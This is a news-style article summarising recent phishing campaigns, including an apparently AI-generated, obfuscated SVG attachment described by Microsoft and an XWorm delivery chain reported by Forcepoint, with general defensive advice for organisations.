Cybercriminals are taking another step as deceptive e mails not only sound smarter but are also cleverly constructed, Microsoft describes how one campaign uses language model-generated code hiding in an SVG file that looks like a neat business graph. And complete with terms like revenue and shares that in reality serve as keys to run hidden scripts and send victims to counterfeit login pages, the pattern fits a broader shift in which AI not only drafts lures but also hides the technology behind the bait.
The attack begins at an already cracked business e mail account that pretends to be a sharing of a document, the attached file appears to be a pdf but is an SVG carrying JavaScript. The sender appears to mail itself while the real targets are in BCC so simple filters suspect nothing. Once opened, a detour follows via a captcha after which a bogus portal harvests login credentials, Microsoft points out that the code does not sound like something a developer would shake out of a sleeve, long-winded, overly modular and full of generic comment lines. This isn the kind of synthetic markup that shakes off static analysis and sandboxing.
That SVG is so attractive has everything to do with its textual and scriptable nature that allows invisible elements, delayed execution and coded attributes to be deployed to hide payloads. Security professionals have long signaled that this file format is useful for those who hijack cross-site abuse or clicks, and the Microsoft case shows how AI takes those capabilities to the next level. Because even defensively AI is now entering the picture, Security Copilot was deployed to recognize the synthetic fingerprint and block the attack, but the lesson is that this approach is being emulated.
While this campaign was limited, other files show attackers walking multiple paths at once. Forcepoint describes a chain in which emails with attachments lead to XWorm via shellcode, reflective DLL injection and memory-loaded modules allow security to be bypassed later in the chain. All these variants wrap the trick in seemingly empty or corrupt Office files to dampen suspicion, the end goal remains remote control and data theft.
Lures are also becoming more creative, Avigdor follows campaigns that send fake legal letters about alleged copyright violations and push victims through a Telegram profile or seemingly neat pdf to info stealers. The names returning are PureLogs and a newcomer known as Lone None, the tactics change by iteration but the core remains the same, urgency and semblance of legitimacy get people moving and the click does the rest.
If you want to boil all this down to its core, you see three movements, AI is being exploited by attackers to cloak code in formats that we perceive as secure. Attack chains are becoming modular so that a blocked step can be replaced immediately. And social psychological lures continue to evolve toward the language and processes of everyday work. Therefore, it pays to organize defenses around behavior, content and chain rather than just around attachments and captions, have incoming email scored on structure and not just words, treat SVG as an active document, and reiterate within teams that a file that looks like a graphic may as well be a program as an executable file. At organizations that train reporting and response on real examples find that risk awareness rises without disrupting operations. And those who provide clear detours in the process, think secure file-sharing portals and quick routes to forward suspicious messages, reduce the temptation to click outside the lines and make a difference even before the first warning lights up
Disclaimer This article is informational and not customized security advice, please consult official bulletins and primary sources when taking technical measures.
